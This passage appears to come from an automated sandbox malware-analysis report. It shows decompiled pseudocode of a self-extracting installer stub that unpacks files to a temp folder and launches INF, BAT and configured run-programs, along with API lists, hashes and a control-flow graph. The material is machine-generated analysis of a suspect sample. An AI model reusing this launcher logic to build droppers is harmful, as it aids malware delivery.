                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E00A0468F(_t130, 0xa09a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





























































                                                                                                                                                                                                                                            0x00a03baa
                                                                                                                                                                                                                                            0x00a03bb0
                                                                                                                                                                                                                                            0x00a03bb7
                                                                                                                                                                                                                                            0x00a03bc0
                                                                                                                                                                                                                                            0x00a03bc2
                                                                                                                                                                                                                                            0x00a03bc9
                                                                                                                                                                                                                                            0x00a03bcb
                                                                                                                                                                                                                                            0x00a03bcf
                                                                                                                                                                                                                                            0x00a03bd3
                                                                                                                                                                                                                                            0x00a03bd9
                                                                                                                                                                                                                                            0x00a03bfd
                                                                                                                                                                                                                                            0x00a03bfd
                                                                                                                                                                                                                                            0x00a03bff
                                                                                                                                                                                                                                            0x00a03c03
                                                                                                                                                                                                                                            0x00a03c03
                                                                                                                                                                                                                                            0x00a03c11
                                                                                                                                                                                                                                            0x00a03c16
                                                                                                                                                                                                                                            0x00a03c19
                                                                                                                                                                                                                                            0x00a03c28
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c30
                                                                                                                                                                                                                                            0x00a03c39
                                                                                                                                                                                                                                            0x00a03c40
                                                                                                                                                                                                                                            0x00a03d13
                                                                                                                                                                                                                                            0x00a03d15
                                                                                                                                                                                                                                            0x00a03d21
                                                                                                                                                                                                                                            0x00a03d26
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c4f
                                                                                                                                                                                                                                            0x00a03c56
                                                                                                                                                                                                                                            0x00a03c60
                                                                                                                                                                                                                                            0x00a03c65
                                                                                                                                                                                                                                            0x00a03c77
                                                                                                                                                                                                                                            0x00a03c78
                                                                                                                                                                                                                                            0x00a03c7c
                                                                                                                                                                                                                                            0x00a03c7e
                                                                                                                                                                                                                                            0x00a03c82
                                                                                                                                                                                                                                            0x00a03c82
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c7c
                                                                                                                                                                                                                                            0x00a03c67
                                                                                                                                                                                                                                            0x00a03c69
                                                                                                                                                                                                                                            0x00a03c6d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c58
                                                                                                                                                                                                                                            0x00a03c58
                                                                                                                                                                                                                                            0x00a03c6e
                                                                                                                                                                                                                                            0x00a03c6e
                                                                                                                                                                                                                                            0x00a03c87
                                                                                                                                                                                                                                            0x00a03c89
                                                                                                                                                                                                                                            0x00a03d4d
                                                                                                                                                                                                                                            0x00a03d4f
                                                                                                                                                                                                                                            0x00a03d50
                                                                                                                                                                                                                                            0x00a03d52
                                                                                                                                                                                                                                            0x00a03d9e
                                                                                                                                                                                                                                            0x00a03da8
                                                                                                                                                                                                                                            0x00a03daf
                                                                                                                                                                                                                                            0x00a03db4
                                                                                                                                                                                                                                            0x00a03db6
                                                                                                                                                                                                                                            0x00a03f4d
                                                                                                                                                                                                                                            0x00a03f4d
                                                                                                                                                                                                                                            0x00a03f4f
                                                                                                                                                                                                                                            0x00a03f56
                                                                                                                                                                                                                                            0x00a03f57
                                                                                                                                                                                                                                            0x00a03f58
                                                                                                                                                                                                                                            0x00a03f63
                                                                                                                                                                                                                                            0x00a03f63
                                                                                                                                                                                                                                            0x00a03dbc
                                                                                                                                                                                                                                            0x00a03dc0
                                                                                                                                                                                                                                            0x00a03dc2
                                                                                                                                                                                                                                            0x00a03de6
                                                                                                                                                                                                                                            0x00a03de6
                                                                                                                                                                                                                                            0x00a03de8
                                                                                                                                                                                                                                            0x00a03f0b
                                                                                                                                                                                                                                            0x00a03f0b
                                                                                                                                                                                                                                            0x00a03f0f
                                                                                                                                                                                                                                            0x00a03f13
                                                                                                                                                                                                                                            0x00a03f15
                                                                                                                                                                                                                                            0x00a03f1a
                                                                                                                                                                                                                                            0x00a03f1c
                                                                                                                                                                                                                                            0x00a03f46
                                                                                                                                                                                                                                            0x00a03f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03f47
                                                                                                                                                                                                                                            0x00a03f1e
                                                                                                                                                                                                                                            0x00a03f1f
                                                                                                                                                                                                                                            0x00a03f25
                                                                                                                                                                                                                                            0x00a03f26
                                                                                                                                                                                                                                            0x00a03f2a
                                                                                                                                                                                                                                            0x00a03f2d
                                                                                                                                                                                                                                            0x00a03fd9
                                                                                                                                                                                                                                            0x00a03fd9
                                                                                                                                                                                                                                            0x00a03fda
                                                                                                                                                                                                                                            0x00a03fda
                                                                                                                                                                                                                                            0x00a03fe1
                                                                                                                                                                                                                                            0x00a03fe3
                                                                                                                                                                                                                                            0x00a03fe3
                                                                                                                                                                                                                                            0x00a03fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03fe8
                                                                                                                                                                                                                                            0x00a03f33
                                                                                                                                                                                                                                            0x00a03f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03f37
                                                                                                                                                                                                                                            0x00a03dee
                                                                                                                                                                                                                                            0x00a03dee
                                                                                                                                                                                                                                            0x00a03df5
                                                                                                                                                                                                                                            0x00a03fad
                                                                                                                                                                                                                                            0x00a03fb9
                                                                                                                                                                                                                                            0x00a03fc2
                                                                                                                                                                                                                                            0x00a03fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03fc8
                                                                                                                                                                                                                                            0x00a03dfb
                                                                                                                                                                                                                                            0x00a03dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03e03
                                                                                                                                                                                                                                            0x00a03e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03e15
                                                                                                                                                                                                                                            0x00a03e17
                                                                                                                                                                                                                                            0x00a03e19
                                                                                                                                                                                                                                            0x00a03f94
                                                                                                                                                                                                                                            0x00a03fa4
                                                                                                                                                                                                                                            0x00a03f7c
                                                                                                                                                                                                                                            0x00a03f80
                                                                                                                                                                                                                                            0x00a03f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03f8b
                                                                                                                                                                                                                                            0x00a03e2c
                                                                                                                                                                                                                                            0x00a03e30
                                                                                                                                                                                                                                            0x00a03e34
                                                                                                                                                                                                                                            0x00a03e36
                                                                                                                                                                                                                                            0x00a03f69
                                                                                                                                                                                                                                            0x00a03f6e
                                                                                                                                                                                                                                            0x00a03f70
                                                                                                                                                                                                                                            0x00a03f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03f76
                                                                                                                                                                                                                                            0x00a03e3c
                                                                                                                                                                                                                                            0x00a03e43
                                                                                                                                                                                                                                            0x00a03e47
                                                                                                                                                                                                                                            0x00a03e52
                                                                                                                                                                                                                                            0x00a03e56
                                                                                                                                                                                                                                            0x00a03e5c
                                                                                                                                                                                                                                            0x00a03e61
                                                                                                                                                                                                                                            0x00a03e68
                                                                                                                                                                                                                                            0x00a03e70
                                                                                                                                                                                                                                            0x00a03e74
                                                                                                                                                                                                                                            0x00a03e7c
                                                                                                                                                                                                                                            0x00a03e80
                                                                                                                                                                                                                                            0x00a03e82
                                                                                                                                                                                                                                            0x00a03e82
                                                                                                                                                                                                                                            0x00a03e87
                                                                                                                                                                                                                                            0x00a03e87
                                                                                                                                                                                                                                            0x00a03e8b
                                                                                                                                                                                                                                            0x00a03e91
                                                                                                                                                                                                                                            0x00a03e94
                                                                                                                                                                                                                                            0x00a03e96
                                                                                                                                                                                                                                            0x00a03e96
                                                                                                                                                                                                                                            0x00a03e9b
                                                                                                                                                                                                                                            0x00a03e9b
                                                                                                                                                                                                                                            0x00a03e9f
                                                                                                                                                                                                                                            0x00a03ea2
                                                                                                                                                                                                                                            0x00a03ea4
                                                                                                                                                                                                                                            0x00a03ea4
                                                                                                                                                                                                                                            0x00a03ea9
                                                                                                                                                                                                                                            0x00a03ea9
                                                                                                                                                                                                                                            0x00a03ead
                                                                                                                                                                                                                                            0x00a03eb3
                                                                                                                                                                                                                                            0x00a03eb6
                                                                                                                                                                                                                                            0x00a03eb8
                                                                                                                                                                                                                                            0x00a03eb8
                                                                                                                                                                                                                                            0x00a03ebd
                                                                                                                                                                                                                                            0x00a03ebd
                                                                                                                                                                                                                                            0x00a03ec1
                                                                                                                                                                                                                                            0x00a03ec3
                                                                                                                                                                                                                                            0x00a03ec5
                                                                                                                                                                                                                                            0x00a03ec5
                                                                                                                                                                                                                                            0x00a03eca
                                                                                                                                                                                                                                            0x00a03eca
                                                                                                                                                                                                                                            0x00a03ece
                                                                                                                                                                                                                                            0x00a03ed5
                                                                                                                                                                                                                                            0x00a03ed9
                                                                                                                                                                                                                                            0x00a03ee0
                                                                                                                                                                                                                                            0x00a03ee6
                                                                                                                                                                                                                                            0x00a03eea
                                                                                                                                                                                                                                            0x00a03eec
                                                                                                                                                                                                                                            0x00a03eee
                                                                                                                                                                                                                                            0x00a03ef3
                                                                                                                                                                                                                                            0x00a03ef3
                                                                                                                                                                                                                                            0x00a03ef5
                                                                                                                                                                                                                                            0x00a03efa
                                                                                                                                                                                                                                            0x00a03efb
                                                                                                                                                                                                                                            0x00a03efd
                                                                                                                                                                                                                                            0x00a03f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03eff
                                                                                                                                                                                                                                            0x00a03eff
                                                                                                                                                                                                                                            0x00a03f05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03f05
                                                                                                                                                                                                                                            0x00a03efd
                                                                                                                                                                                                                                            0x00a03dc7
                                                                                                                                                                                                                                            0x00a03dce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03dd0
                                                                                                                                                                                                                                            0x00a03dd7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03dd9
                                                                                                                                                                                                                                            0x00a03ddb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03ddd
                                                                                                                                                                                                                                            0x00a03de1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03de1
                                                                                                                                                                                                                                            0x00a03d59
                                                                                                                                                                                                                                            0x00a03d65
                                                                                                                                                                                                                                            0x00a03d6a
                                                                                                                                                                                                                                            0x00a03d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03d6e
                                                                                                                                                                                                                                            0x00a03d75
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03d8f
                                                                                                                                                                                                                                            0x00a03d96
                                                                                                                                                                                                                                            0x00a03d98
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03d98
                                                                                                                                                                                                                                            0x00a03c8f
                                                                                                                                                                                                                                            0x00a03c98
                                                                                                                                                                                                                                            0x00a03cf1
                                                                                                                                                                                                                                            0x00a03cf3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03cfe
                                                                                                                                                                                                                                            0x00a03d11
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03d11
                                                                                                                                                                                                                                            0x00a03c9c
                                                                                                                                                                                                                                            0x00a03ca5
                                                                                                                                                                                                                                            0x00a03ca7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03cad
                                                                                                                                                                                                                                            0x00a03cb2
                                                                                                                                                                                                                                            0x00a03cb7
                                                                                                                                                                                                                                            0x00a03cc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03ce8
                                                                                                                                                                                                                                            0x00a03cec
                                                                                                                                                                                                                                            0x00a03ced
                                                                                                                                                                                                                                            0x00a03ced
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03ce8
                                                                                                                                                                                                                                            0x00a03c9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c9e
                                                                                                                                                                                                                                            0x00a03c56
                                                                                                                                                                                                                                            0x00a03d35
                                                                                                                                                                                                                                            0x00a03d35
                                                                                                                                                                                                                                            0x00a03d3c
                                                                                                                                                                                                                                            0x00a03d48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03d48
                                                                                                                                                                                                                                            0x00a03c03
                                                                                                                                                                                                                                            0x00a03be2
                                                                                                                                                                                                                                            0x00a03be7
                                                                                                                                                                                                                                            0x00a03bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A03C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A03CDC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A08C42), ref: 00A03D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A03E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A08C42), ref: 00A03EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A08C42), ref: 00A03F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A08C42), ref: 00A03F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A08C42), ref: 00A03F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A08C42), ref: 00A03F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A08C42), ref: 00A03F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A08C42), ref: 00A03FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                            • API String ID: 1032054927-139961720
                                                                                                                                                                                                                                            • Opcode ID: e5fead2c4c6e6ec6fbab2d8f37ae196a6e3c33a9b9e139dd9beb900adb4d95e3
                                                                                                                                                                                                                                            • Instruction ID: 900f6fad37d09b7fa35f84b1a4585083157e8a1d2506466758f74ce99765142c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5fead2c4c6e6ec6fbab2d8f37ae196a6e3c33a9b9e139dd9beb900adb4d95e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1B1357260430D9FEB20DF64E945B6B77E8EB88740F000A2DFA85D61E1DB74C906CB96
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 141 a01ae8-a01b2c call a01680 144 a01b3b-a01b40 141->144 145 a01b2e-a01b39 141->145 146 a01b46-a01b61 call a01a84 144->146 145->146 149 a01b63-a01b65 146->149 150 a01b9f-a01bc2 call a01781 call a0658a 146->150 151 a01b68-a01b6d 149->151 157 a01bc7-a01bd3 call a066c8 150->157 151->151 153 a01b6f-a01b74 151->153 153->150 155 a01b76-a01b7b 153->155 158 a01b83-a01b86 155->158 159 a01b7d-a01b81 155->159 165 a01d73-a01d7f call a066c8 157->165 166 a01bd9-a01bf1 CompareStringA 157->166 158->150 162 a01b88-a01b8a 158->162 159->158 161 a01b8c-a01b9d call a01680 159->161 161->157 162->150 162->161 175 a01d81-a01d99 CompareStringA 165->175 176 a01df8-a01e09 LocalAlloc 165->176 166->165 168 a01bf7-a01c07 GetFileAttributesA 166->168 170 a01d53-a01d5e 168->170 171 a01c0d-a01c15 168->171 173 a01d64-a01d6e call a044b9 170->173 171->170 174 a01c1b-a01c33 call a01a84 171->174 187 a01e94-a01ea4 call a06ce0 173->187 189 a01c50-a01c61 LocalAlloc 174->189 190 a01c35-a01c38 174->190 175->176 181 a01d9b-a01da2 175->181 178 a01dd4-a01ddf 176->178 179 a01e0b-a01e1b GetFileAttributesA 176->179 178->173 183 a01e67-a01e73 call a01680 179->183 184 a01e1d-a01e1f 179->184 186 a01da5-a01daa 181->186 199 a01e78-a01e84 call a02aac 183->199 184->183 188 a01e21-a01e3e call a01781 184->188 186->186 191 a01dac-a01db4 186->191 188->199 210 a01e40-a01e43 188->210 189->178 198 a01c67-a01c72 189->198 195 a01c40-a01c4b call a01a84 190->195 196 a01c3a 190->196 197 a01db7-a01dbc 191->197 195->189 196->195 197->197 204 a01dbe-a01dd2 LocalAlloc 197->204 205 a01c74 198->205 206 a01c79-a01cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->206 207 a01e89-a01e92 199->207 204->178 211 a01de1-a01df3 call a0171e 204->211 205->206 208 a01cc2-a01ccc 206->208 209 a01cf8-a01d07 206->209 207->187 212 a01cd3-a01cf3 call a01680 * 2 208->212 213 a01cce 208->213 215 a01d23 209->215 216 a01d09-a01d21 GetShortPathNameA 209->216 210->199 214 a01e45-a01e65 call a016b3 * 2 210->214 211->207 212->207 213->212 214->199 221 a01d28-a01d2b 215->221 216->221 224 a01d32-a01d4e call a0171e 221->224 225 a01d2d 221->225 224->207 225->224
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A01AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E00A01680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E00A01A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E00A01781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            					E00A0658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E00A01680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E00A066C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            							_t139 = 0x2e;
                                                                                                                                                                                                                                            							_t115 = _t156;
                                                                                                                                                                                                                                            							_t58 = E00A066C8(_t115, _t139);
                                                                                                                                                                                                                                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            									E00A01680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_push(_t115);
                                                                                                                                                                                                                                            									_t108 = 0x400;
                                                                                                                                                                                                                                            									E00A01781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                            									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                            										E00A016B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                            										E00A016B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = _t156;
                                                                                                                                                                                                                                            								 *_t156 = 0;
                                                                                                                                                                                                                                            								E00A02AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                            								goto L53;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t145 = _t125 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t76 =  *_t125;
                                                                                                                                                                                                                                            									_t125 = _t125 + 1;
                                                                                                                                                                                                                                            								} while (_t76 != 0);
                                                                                                                                                                                                                                            								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                            								_t146 =  &_v268;
                                                                                                                                                                                                                                            								_t157 = _t146 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t77 =  *_t146;
                                                                                                                                                                                                                                            									_t146 = _t146 + 1;
                                                                                                                                                                                                                                            								} while (_t77 != 0);
                                                                                                                                                                                                                                            								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                            								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                            								if(_t156 != 0) {
                                                                                                                                                                                                                                            									E00A0171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L43;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E00A01A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E00A01A84( &_v1556, "]");
